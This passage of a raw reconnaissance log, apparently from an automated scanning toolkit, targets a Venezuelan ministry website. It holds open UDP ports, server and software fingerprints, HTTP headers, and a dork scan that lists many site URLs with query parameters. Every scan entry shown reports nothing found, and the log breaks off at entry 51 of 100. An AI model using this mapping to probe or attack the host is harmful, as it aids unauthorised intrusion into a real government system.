  695. PORT STATE SERVICE
  696. 53/udp open|filtered domain
  697. 67/udp open|filtered dhcps
  698. 68/udp open|filtered dhcpc
  699. 69/udp open|filtered tftp
  700. 88/udp open|filtered kerberos-sec
  701. 123/udp open|filtered ntp
  702. 137/udp open|filtered netbios-ns
  703. 138/udp open|filtered netbios-dgm
  704. 139/udp open|filtered netbios-ssn
  705. 161/udp open|filtered snmp
  706. 162/udp open|filtered snmptrap
  707. 389/udp open|filtered ldap
  708. 520/udp open|filtered route
  709. 2049/udp open|filtered nfs
  710. #######################################################################################################################################
  711. http://minppibes.gob.ve [200 OK] Apache[2.4.10], Country[VENEZUELA][VE], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[150.188.25.46], Meta-Author[Dirección de Tecnología de la Información y la Comunicación - ], Meta-Refresh-Redirect[http://www.minppibes.gob.ve/web-final/index.php], Title[MPP]
  712. http://www.minppibes.gob.ve/web-final/index.php [200 OK] Apache[2.4.10], Country[VENEZUELA][VE], Frame, Google-Analytics[Universal][UA-88692830-1], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[150.188.25.46], JQuery[1.10.2,1.11.3,1.12.0,2.1.1], Meta-Author[Oficina de Tecnología de la Información y la Comunicación - OTIC - ], Script[text/javascript], Title[Ministerio del Poder Popular de Industrias y Producción Nacional]
  713. #######################################################################################################################################
  714. wig - WebApp Information Gatherer
  715.  
  716.  
  717. Scanning http://minppibes.gob.ve...
  718. _________________________ SITE INFO _________________________
  719. IP Title
  720. 150.188.25.46 MPP
  721.  
  722. __________________________ VERSION __________________________
  723. Name Versions Type
  724. Apache 2.4.10 Platform
  725. Debian 8.0 | 8.0 (pre-release) OS
  726.  
  727. ________________________ INTERESTING ________________________
  728. URL Note Type
  729. /robots.txt robots.txt index Interesting
  730.  
  731. _____________________________________________________________
  732. Time: 147.8 sec Urls: 812 Fingerprints: 40401
  733. #######################################################################################################################################
  734. HTTP/1.1 200 OK
  735. Date: Sat, 01 Sep 2018 20:06:51 GMT
  736. Server: Apache/2.4.10 (Debian)
  737. Last-Modified: Tue, 07 Aug 2018 11:22:34 GMT
  738. ETag: "894-572d69c47e55e"
  739. Accept-Ranges: bytes
  740. Content-Length: 2196
  741. Vary: Accept-Encoding
  742. Content-Type: text/html
  743. #######################################################################################################################################
  744. --------------------------------------------------------------------------------------------------------------------------------------
  745.  
  746. [ ! ] Starting SCANNER INURLBR 2.1 at [01-09-2018 20:49:17]
  747. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  748. It is the end user's responsibility to obey all applicable local, state and federal laws.
  749. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  750.  
  751. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-minppibes.gob.ve.txt ]
  752. [ INFO ][ DORK ]::[ site:minppibes.gob.ve ]
  753. [ INFO ][ SEARCHING ]:: {
  754. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.mg ]
  755.  
  756. [ INFO ][ SEARCHING ]::
  757. -[:::]
  758. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  759.  
  760. [ INFO ][ SEARCHING ]::
  761. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  762. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.eg ID: 002901626849897788481:cpnctza84gq ]
  763.  
  764. [ INFO ][ SEARCHING ]::
  765. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  766.  
  767. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  768.  
  769.  
  770. _[ - ]::--------------------------------------------------------------------------------------------------------------
  771. |_[ + ] [ 0 / 100 ]-[20:49:39] [ - ]
  772. |_[ + ] Target:: [ http://www.minppibes.gob.ve/ ]
  773. |_[ + ] Exploit::
  774. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  775. |_[ + ] More details:: / - / , ISP:
  776. |_[ + ] Found:: UNIDENTIFIED
  777.  
  778. _[ - ]::--------------------------------------------------------------------------------------------------------------
  779. |_[ + ] [ 1 / 100 ]-[20:49:43] [ - ]
  780. |_[ + ] Target:: [ https://correo.minppibes.gob.ve/ ]
  781. |_[ + ] Exploit::
  782. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:150.188.25.48:443
  783. |_[ + ] More details:: / - / , ISP:
  784. |_[ + ] Found:: UNIDENTIFIED
  785.  
  786. _[ - ]::--------------------------------------------------------------------------------------------------------------
  787. |_[ + ] [ 2 / 100 ]-[20:49:47] [ - ]
  788. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/Regifor.php ]
  789. |_[ + ] Exploit::
  790. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  791. |_[ + ] More details:: / - / , ISP:
  792. |_[ + ] Found:: UNIDENTIFIED
  793.  
  794. _[ - ]::--------------------------------------------------------------------------------------------------------------
  795. |_[ + ] [ 3 / 100 ]-[20:49:50] [ - ]
  796. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/Competencia.php ]
  797. |_[ + ] Exploit::
  798. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  799. |_[ + ] More details:: / - / , ISP:
  800. |_[ + ] Found:: UNIDENTIFIED
  801.  
  802. _[ - ]::--------------------------------------------------------------------------------------------------------------
  803. |_[ + ] [ 4 / 100 ]-[20:49:53] [ - ]
  804. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/Perfil_Ministro.php ]
  805. |_[ + ] Exploit::
  806. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  807. |_[ + ] More details:: / - / , ISP:
  808. |_[ + ] Found:: UNIDENTIFIED
  809.  
  810. _[ - ]::--------------------------------------------------------------------------------------------------------------
  811. |_[ + ] [ 5 / 100 ]-[20:49:55] [ - ]
  812. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/Objetivos_Politicas_Estrategias.php ]
  813. |_[ + ] Exploit::
  814. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  815. |_[ + ] More details:: / - / , ISP:
  816. |_[ + ] Found:: UNIDENTIFIED
  817.  
  818. _[ - ]::--------------------------------------------------------------------------------------------------------------
  819. |_[ + ] [ 6 / 100 ]-[20:49:58] [ - ]
  820. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/Servicios.php ]
  821. |_[ + ] Exploit::
  822. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  823. |_[ + ] More details:: / - / , ISP:
  824. |_[ + ] Found:: UNIDENTIFIED
  825.  
  826. _[ - ]::--------------------------------------------------------------------------------------------------------------
  827. |_[ + ] [ 7 / 100 ]-[20:50:01] [ - ]
  828. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/Organigrama.php ]
  829. |_[ + ] Exploit::
  830. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  831. |_[ + ] More details:: / - / , ISP:
  832. |_[ + ] Found:: UNIDENTIFIED
  833.  
  834. _[ - ]::--------------------------------------------------------------------------------------------------------------
  835. |_[ + ] [ 8 / 100 ]-[20:50:04] [ - ]
  836. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/Contactos.php ]
  837. |_[ + ] Exploit::
  838. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  839. |_[ + ] More details:: / - / , ISP:
  840. |_[ + ] Found:: UNIDENTIFIED
  841.  
  842. _[ - ]::--------------------------------------------------------------------------------------------------------------
  843. |_[ + ] [ 9 / 100 ]-[20:50:07] [ - ]
  844. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=329 ]
  845. |_[ + ] Exploit::
  846. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  847. |_[ + ] More details:: / - / , ISP:
  848. |_[ + ] Found:: UNIDENTIFIED
  849.  
  850. _[ - ]::--------------------------------------------------------------------------------------------------------------
  851. |_[ + ] [ 10 / 100 ]-[20:50:10] [ - ]
  852. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=885 ]
  853. |_[ + ] Exploit::
  854. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  855. |_[ + ] More details:: / - / , ISP:
  856. |_[ + ] Found:: UNIDENTIFIED
  857.  
  858. _[ - ]::--------------------------------------------------------------------------------------------------------------
  859. |_[ + ] [ 11 / 100 ]-[20:50:12] [ - ]
  860. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=597 ]
  861. |_[ + ] Exploit::
  862. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  863. |_[ + ] More details:: / - / , ISP:
  864. |_[ + ] Found:: UNIDENTIFIED
  865.  
  866. _[ - ]::--------------------------------------------------------------------------------------------------------------
  867. |_[ + ] [ 12 / 100 ]-[20:50:15] [ - ]
  868. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=254 ]
  869. |_[ + ] Exploit::
  870. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  871. |_[ + ] More details:: / - / , ISP:
  872. |_[ + ] Found:: UNIDENTIFIED
  873.  
  874. _[ - ]::--------------------------------------------------------------------------------------------------------------
  875. |_[ + ] [ 13 / 100 ]-[20:50:18] [ - ]
  876. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1002 ]
  877. |_[ + ] Exploit::
  878. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  879. |_[ + ] More details:: / - / , ISP:
  880. |_[ + ] Found:: UNIDENTIFIED
  881.  
  882. _[ - ]::--------------------------------------------------------------------------------------------------------------
  883. |_[ + ] [ 14 / 100 ]-[20:50:22] [ - ]
  884. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1001 ]
  885. |_[ + ] Exploit::
  886. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  887. |_[ + ] More details:: / - / , ISP:
  888. |_[ + ] Found:: UNIDENTIFIED
  889.  
  890. _[ - ]::--------------------------------------------------------------------------------------------------------------
  891. |_[ + ] [ 15 / 100 ]-[20:50:24] [ - ]
  892. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=942 ]
  893. |_[ + ] Exploit::
  894. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  895. |_[ + ] More details:: / - / , ISP:
  896. |_[ + ] Found:: UNIDENTIFIED
  897.  
  898. _[ - ]::--------------------------------------------------------------------------------------------------------------
  899. |_[ + ] [ 16 / 100 ]-[20:50:27] [ - ]
  900. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=366 ]
  901. |_[ + ] Exploit::
  902. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  903. |_[ + ] More details:: / - / , ISP:
  904. |_[ + ] Found:: UNIDENTIFIED
  905.  
  906. _[ - ]::--------------------------------------------------------------------------------------------------------------
  907. |_[ + ] [ 17 / 100 ]-[20:50:30] [ - ]
  908. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=294 ]
  909. |_[ + ] Exploit::
  910. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  911. |_[ + ] More details:: / - / , ISP:
  912. |_[ + ] Found:: UNIDENTIFIED
  913.  
  914. _[ - ]::--------------------------------------------------------------------------------------------------------------
  915. |_[ + ] [ 18 / 100 ]-[20:50:33] [ - ]
  916. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=796 ]
  917. |_[ + ] Exploit::
  918. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  919. |_[ + ] More details:: / - / , ISP:
  920. |_[ + ] Found:: UNIDENTIFIED
  921.  
  922. _[ - ]::--------------------------------------------------------------------------------------------------------------
  923. |_[ + ] [ 19 / 100 ]-[20:50:36] [ - ]
  924. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=321 ]
  925. |_[ + ] Exploit::
  926. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  927. |_[ + ] More details:: / - / , ISP:
  928. |_[ + ] Found:: UNIDENTIFIED
  929.  
  930. _[ - ]::--------------------------------------------------------------------------------------------------------------
  931. |_[ + ] [ 20 / 100 ]-[20:50:39] [ - ]
  932. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=171 ]
  933. |_[ + ] Exploit::
  934. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  935. |_[ + ] More details:: / - / , ISP:
  936. |_[ + ] Found:: UNIDENTIFIED
  937.  
  938. _[ - ]::--------------------------------------------------------------------------------------------------------------
  939. |_[ + ] [ 21 / 100 ]-[20:50:41] [ - ]
  940. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=341 ]
  941. |_[ + ] Exploit::
  942. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  943. |_[ + ] More details:: / - / , ISP:
  944. |_[ + ] Found:: UNIDENTIFIED
  945.  
  946. _[ - ]::--------------------------------------------------------------------------------------------------------------
  947. |_[ + ] [ 22 / 100 ]-[20:50:44] [ - ]
  948. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=839 ]
  949. |_[ + ] Exploit::
  950. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  951. |_[ + ] More details:: / - / , ISP:
  952. |_[ + ] Found:: UNIDENTIFIED
  953.  
  954. _[ - ]::--------------------------------------------------------------------------------------------------------------
  955. |_[ + ] [ 23 / 100 ]-[20:50:47] [ - ]
  956. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=271 ]
  957. |_[ + ] Exploit::
  958. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  959. |_[ + ] More details:: / - / , ISP:
  960. |_[ + ] Found:: UNIDENTIFIED
  961.  
  962. _[ - ]::--------------------------------------------------------------------------------------------------------------
  963. |_[ + ] [ 24 / 100 ]-[20:50:50] [ - ]
  964. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1138 ]
  965. |_[ + ] Exploit::
  966. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  967. |_[ + ] More details:: / - / , ISP:
  968. |_[ + ] Found:: UNIDENTIFIED
  969.  
  970. _[ - ]::--------------------------------------------------------------------------------------------------------------
  971. |_[ + ] [ 25 / 100 ]-[20:50:53] [ - ]
  972. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=259 ]
  973. |_[ + ] Exploit::
  974. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  975. |_[ + ] More details:: / - / , ISP:
  976. |_[ + ] Found:: UNIDENTIFIED
  977.  
  978. _[ - ]::--------------------------------------------------------------------------------------------------------------
  979. |_[ + ] [ 26 / 100 ]-[20:50:56] [ - ]
  980. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=657 ]
  981. |_[ + ] Exploit::
  982. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  983. |_[ + ] More details:: / - / , ISP:
  984. |_[ + ] Found:: UNIDENTIFIED
  985.  
  986. _[ - ]::--------------------------------------------------------------------------------------------------------------
  987. |_[ + ] [ 27 / 100 ]-[20:50:58] [ - ]
  988. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=138 ]
  989. |_[ + ] Exploit::
  990. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  991. |_[ + ] More details:: / - / , ISP:
  992. |_[ + ] Found:: UNIDENTIFIED
  993.  
  994. _[ - ]::--------------------------------------------------------------------------------------------------------------
  995. |_[ + ] [ 28 / 100 ]-[20:51:01] [ - ]
  996. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=145 ]
  997. |_[ + ] Exploit::
  998. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  999. |_[ + ] More details:: / - / , ISP:
  1000. |_[ + ] Found:: UNIDENTIFIED
  1001.  
  1002. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1003. |_[ + ] [ 29 / 100 ]-[20:51:04] [ - ]
  1004. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=383 ]
  1005. |_[ + ] Exploit::
  1006. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1007. |_[ + ] More details:: / - / , ISP:
  1008. |_[ + ] Found:: UNIDENTIFIED
  1009.  
  1010. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1011. |_[ + ] [ 30 / 100 ]-[20:51:07] [ - ]
  1012. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=433 ]
  1013. |_[ + ] Exploit::
  1014. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1015. |_[ + ] More details:: / - / , ISP:
  1016. |_[ + ] Found:: UNIDENTIFIED
  1017.  
  1018. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1019. |_[ + ] [ 31 / 100 ]-[20:51:10] [ - ]
  1020. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=93 ]
  1021. |_[ + ] Exploit::
  1022. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1023. |_[ + ] More details:: / - / , ISP:
  1024. |_[ + ] Found:: UNIDENTIFIED
  1025.  
  1026. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1027. |_[ + ] [ 32 / 100 ]-[20:51:13] [ - ]
  1028. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=874 ]
  1029. |_[ + ] Exploit::
  1030. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1031. |_[ + ] More details:: / - / , ISP:
  1032. |_[ + ] Found:: UNIDENTIFIED
  1033.  
  1034. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1035. |_[ + ] [ 33 / 100 ]-[20:51:16] [ - ]
  1036. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=268 ]
  1037. |_[ + ] Exploit::
  1038. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1039. |_[ + ] More details:: / - / , ISP:
  1040. |_[ + ] Found:: UNIDENTIFIED
  1041.  
  1042. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1043. |_[ + ] [ 34 / 100 ]-[20:51:19] [ - ]
  1044. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=858 ]
  1045. |_[ + ] Exploit::
  1046. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1047. |_[ + ] More details:: / - / , ISP:
  1048. |_[ + ] Found:: UNIDENTIFIED
  1049.  
  1050. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1051. |_[ + ] [ 35 / 100 ]-[20:51:22] [ - ]
  1052. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=557 ]
  1053. |_[ + ] Exploit::
  1054. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1055. |_[ + ] More details:: / - / , ISP:
  1056. |_[ + ] Found:: UNIDENTIFIED
  1057.  
  1058. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1059. |_[ + ] [ 36 / 100 ]-[20:51:24] [ - ]
  1060. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=947 ]
  1061. |_[ + ] Exploit::
  1062. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1063. |_[ + ] More details:: / - / , ISP:
  1064. |_[ + ] Found:: UNIDENTIFIED
  1065.  
  1066. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1067. |_[ + ] [ 37 / 100 ]-[20:51:27] [ - ]
  1068. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1208 ]
  1069. |_[ + ] Exploit::
  1070. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1071. |_[ + ] More details:: / - / , ISP:
  1072. |_[ + ] Found:: UNIDENTIFIED
  1073.  
  1074. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1075. |_[ + ] [ 38 / 100 ]-[20:51:30] [ - ]
  1076. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=44 ]
  1077. |_[ + ] Exploit::
  1078. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1079. |_[ + ] More details:: / - / , ISP:
  1080. |_[ + ] Found:: UNIDENTIFIED
  1081.  
  1082. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1083. |_[ + ] [ 39 / 100 ]-[20:51:33] [ - ]
  1084. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=214 ]
  1085. |_[ + ] Exploit::
  1086. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1087. |_[ + ] More details:: / - / , ISP:
  1088. |_[ + ] Found:: UNIDENTIFIED
  1089.  
  1090. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1091. |_[ + ] [ 40 / 100 ]-[20:51:36] [ - ]
  1092. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=689 ]
  1093. |_[ + ] Exploit::
  1094. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1095. |_[ + ] More details:: / - / , ISP:
  1096. |_[ + ] Found:: UNIDENTIFIED
  1097.  
  1098. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1099. |_[ + ] [ 41 / 100 ]-[20:51:40] [ - ]
  1100. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=967 ]
  1101. |_[ + ] Exploit::
  1102. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1103. |_[ + ] More details:: / - / , ISP:
  1104. |_[ + ] Found:: UNIDENTIFIED
  1105.  
  1106. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1107. |_[ + ] [ 42 / 100 ]-[20:51:43] [ - ]
  1108. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1365 ]
  1109. |_[ + ] Exploit::
  1110. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1111. |_[ + ] More details:: / - / , ISP:
  1112. |_[ + ] Found:: UNIDENTIFIED
  1113.  
  1114. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1115. |_[ + ] [ 43 / 100 ]-[20:51:46] [ - ]
  1116. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=593 ]
  1117. |_[ + ] Exploit::
  1118. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1119. |_[ + ] More details:: / - / , ISP:
  1120. |_[ + ] Found:: UNIDENTIFIED
  1121.  
  1122. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1123. |_[ + ] [ 44 / 100 ]-[20:51:48] [ - ]
  1124. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=697 ]
  1125. |_[ + ] Exploit::
  1126. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1127. |_[ + ] More details:: / - / , ISP:
  1128. |_[ + ] Found:: UNIDENTIFIED
  1129.  
  1130. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1131. |_[ + ] [ 45 / 100 ]-[20:51:51] [ - ]
  1132. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=206 ]
  1133. |_[ + ] Exploit::
  1134. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1135. |_[ + ] More details:: / - / , ISP:
  1136. |_[ + ] Found:: UNIDENTIFIED
  1137.  
  1138. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1139. |_[ + ] [ 46 / 100 ]-[20:51:54] [ - ]
  1140. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=344 ]
  1141. |_[ + ] Exploit::
  1142. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1143. |_[ + ] More details:: / - / , ISP:
  1144. |_[ + ] Found:: UNIDENTIFIED
  1145.  
  1146. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1147. |_[ + ] [ 47 / 100 ]-[20:51:57] [ - ]
  1148. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=195 ]
  1149. |_[ + ] Exploit::
  1150. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1151. |_[ + ] More details:: / - / , ISP:
  1152. |_[ + ] Found:: UNIDENTIFIED
  1153.  
  1154. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1155. |_[ + ] [ 48 / 100 ]-[20:52:00] [ - ]
  1156. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1159 ]
  1157. |_[ + ] Exploit::
  1158. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1159. |_[ + ] More details:: / - / , ISP:
  1160. |_[ + ] Found:: UNIDENTIFIED
  1161.  
  1162. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1163. |_[ + ] [ 49 / 100 ]-[20:52:03] [ - ]
  1164. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=661 ]
  1165. |_[ + ] Exploit::
  1166. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1167. |_[ + ] More details:: / - / , ISP:
  1168. |_[ + ] Found:: UNIDENTIFIED
  1169.  
  1170. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1171. |_[ + ] [ 50 / 100 ]-[20:52:05] [ - ]
  1172. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1343 ]
  1173. |_[ + ] Exploit::
  1174. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1175. |_[ + ] More details:: / - / , ISP:
  1176. |_[ + ] Found:: UNIDENTIFIED
  1177.  
  1178. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1179. |_[ + ] [ 51 / 100 ]-[20:52:08] [ - ]
  1180. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=395 ]
  1181. |_[ + ] Exploit::
